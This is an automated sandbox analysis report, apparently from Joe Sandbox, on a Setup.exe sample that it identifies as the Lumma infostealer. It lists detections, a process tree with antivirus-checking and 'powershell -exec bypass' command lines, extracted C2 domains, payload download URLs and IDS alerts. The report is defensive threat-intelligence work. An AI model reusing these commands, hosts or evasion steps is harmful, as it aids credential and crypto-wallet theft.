Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1580131
MD5:588eeb3d8f305fc008f034e10e0015c0
SHA1:7a77ed807fbea72e7c94295343cf795e864adfae
SHA256:d46db03077a8a6773fd70b126d8f3d61e8370ed0c1dfb26df73499cb3b65355f
Tags:exeuser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation Via Stdin
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 588EEB3D8F305FC008F034E10E0015C0)
    • cmd.exe (PID: 7580 cmdline: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7676 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7684 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7720 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7744 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7764 cmdline: cmd /c md 280366 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • extrac32.exe (PID: 7780 cmdline: extrac32 /Y /E Agrees MD5: 9472AAB6390E4F1431BAA912FCFF9707)
      • findstr.exe (PID: 7804 cmdline: findstr /V "Travels" Served MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7820 cmdline: cmd /c copy /b ..\Statement + ..\Avon + ..\Gnome + ..\Digital + ..\Clearing + ..\Flat + ..\Systems I MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Hc.com (PID: 7836 cmdline: Hc.com I MD5: 62D09F076E6E0240548C2F837536A46A)
        • powershell.exe (PID: 7312 cmdline: powershell -exec bypass error code: 523 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 7328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2836 cmdline: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8f6c8140d9e27288</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span> </p> <script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script> </div><!-- /.error-footer --> </div><!-- /#cf-error-details --> </div><!-- /#cf-wrapper --> <script> window._cf_translation = {}; </script> </body> </html> MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 7852 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["hungrypaster.click", "tentabatte.lat", "curverpluch.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "shapestickyr.lat"], "Build id": "hRjzG3--GAS"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      Process Memory Space: Hc.com PID: 7836JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Hc.com PID: 7836JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Invoke-Obfuscation Via Stdin
            Source: Process startedAuthor: Nikita Nazarov, oscd.community: Data: Command: powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="RskevRB4u02FLFVl.7vQxYmyVWENwhkb2yKr86BmjBM-1735000458-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> </div> </div> </div><!-- /.section --> <div id="ts-blocks" style="display:none;"></div> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <
            Sigma detected: Suspicious PowerShell Parameter Substring
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Hc.com I, ParentImage: C:\Users\user\AppData\Local\Temp\280366\Hc.com, ParentProcessId: 7836, ParentProcessName: Hc.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 7312, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Hc.com I, ParentImage: C:\Users\user\AppData\Local\Temp\280366\Hc.com, ParentProcessId: 7836, ParentProcessName: Hc.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 7312, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass error code: 523, CommandLine: powershell -exec bypass error code: 523, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: Hc.com I, ParentImage: C:\Users\user\AppData\Local\Temp\280366\Hc.com, ParentProcessId: 7836, ParentProcessName: Hc.com, ProcessCommandLine: powershell -exec bypass error code: 523, ProcessId: 7312, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Search for Antivirus process
            Source: Process startedAuthor: Joe Security: Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Clicks Clicks.cmd & Clicks.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7580, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7744, ProcessName: findstr.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T01:33:55.070414+010020283713Unknown Traffic192.168.2.449742188.114.97.6443TCP
            2024-12-24T01:33:57.315963+010020283713Unknown Traffic192.168.2.449743188.114.97.6443TCP
            2024-12-24T01:33:59.453447+010020283713Unknown Traffic192.168.2.449744188.114.97.6443TCP
            2024-12-24T01:34:01.741478+010020283713Unknown Traffic192.168.2.449745188.114.97.6443TCP
            2024-12-24T01:34:04.082295+010020283713Unknown Traffic192.168.2.449746188.114.97.6443TCP
            2024-12-24T01:34:06.375667+010020283713Unknown Traffic192.168.2.449747188.114.97.6443TCP
            2024-12-24T01:34:08.690904+010020283713Unknown Traffic192.168.2.449748188.114.97.6443TCP
            2024-12-24T01:34:10.828901+010020283713Unknown Traffic192.168.2.449749188.114.97.6443TCP
            2024-12-24T01:34:13.058213+010020283713Unknown Traffic192.168.2.449750172.67.169.205443TCP
            2024-12-24T01:34:18.115128+010020283713Unknown Traffic192.168.2.449751104.21.84.113443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T01:33:56.093923+010020546531A Network Trojan was detected192.168.2.449742188.114.97.6443TCP
            2024-12-24T01:33:58.076932+010020546531A Network Trojan was detected192.168.2.449743188.114.97.6443TCP
            2024-12-24T01:34:11.616553+010020546531A Network Trojan was detected192.168.2.449749188.114.97.6443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T01:33:56.093923+010020498361A Network Trojan was detected192.168.2.449742188.114.97.6443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T01:33:58.076932+010020498121A Network Trojan was detected192.168.2.449743188.114.97.6443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-24T01:34:09.604944+010020480941Malware Command and Control Activity Detected192.168.2.449748188.114.97.6443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://kliptizq.shop:443/int_clp_ldr_sha.txtAvira URL Cloud: Label: malware
            Source: https://kliptizq.shop/(W#Avira URL Cloud: Label: malware
            Source: https://kliptizq.shop/Avira URL Cloud: Label: malware
            Source: https://neqi.shop/sdgjyut/psh.txtAvira URL Cloud: Label: malware
            Source: https://neqi.shop/Avira URL Cloud: Label: malware
            Source: https://neqi.shop:443/sdgjyut/psh.txtAvira URL Cloud: Label: malware
            Source: https://neqi.shop/sdgjyut/psh.txtoAvira URL Cloud: Label: malware
            Source: https://neqi.shop/BJAvira URL Cloud: Label: malware
            Source: https://neqi.shop/sdgjyut/psh.txtkAvira URL Cloud: Label: malware
            Found malware configuration
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["hungrypaster.click", "tentabatte.lat", "curverpluch.lat", "wordyfindy.lat", "bashfulacid.lat", "slipperyloo.lat", "talkynicer.lat", "manyrestro.lat", "shapestickyr.lat"], "Build id": "hRjzG3--GAS"}
            Sample uses string decryption to hide its real strings
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: bashfulacid.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: tentabatte.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: curverpluch.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: talkynicer.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: shapestickyr.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: manyrestro.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: slipperyloo.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: wordyfindy.lat
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: hungrypaster.click
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 0000000B.00000003.1992640824.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString decryptor: hRjzG3--GAS
            Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49745 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.6:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.169.205:443 -> 192.168.2.4:49750 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.84.113:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2341213621.0000000007879000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
            Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CDC54
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA087
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_002DA1E2
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,11_2_002CE472
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002DA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,11_2_002DA570
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_0029C622 FindFirstFileExW,11_2_0029C622
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D66DC FindFirstFileW,FindNextFileW,FindClose,11_2_002D66DC
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D7333 FindFirstFileW,FindClose,11_2_002D7333
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002D73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,11_2_002D73D4
            Source: C:\Users\user\AppData\Local\Temp\280366\Hc.comCode function: 11_2_002CD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_002CD921
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\280366\Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49749 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49742 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49742 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49748 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49743 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49743 -> 188.114.97.6:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: hungrypaster.click
            Source: Malware configuration extractorURLs: tentabatte.lat
            Source: Malware configuration extractorURLs: curverpluch.lat
            Source: Malware configuration extractorURLs: wordyfindy.lat
            Source: Malware configuration extractorURLs: bashfulacid.lat
            Source: Malware configuration extractorURLs: slipperyloo.lat
            Source: Malware configuration extractorURLs: talkynicer.lat
            Source: Malware configuration extractorURLs: manyrestro.lat
            Source: Malware configuration extractorURLs: shapestickyr.lat
            Source: Joe Sandbox ViewIP Address: 188.114.97.6 188.114.97.6
            Source: Joe Sandbox ViewIP Address: 188.114.97.6 188.114.97.6
            Source: Joe Sandbox ViewIP Address: 104.21.84.113 104.21.84.113
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49751 -> 104.21.84.113:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 188.114.97.6:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 188.114.97.6:443
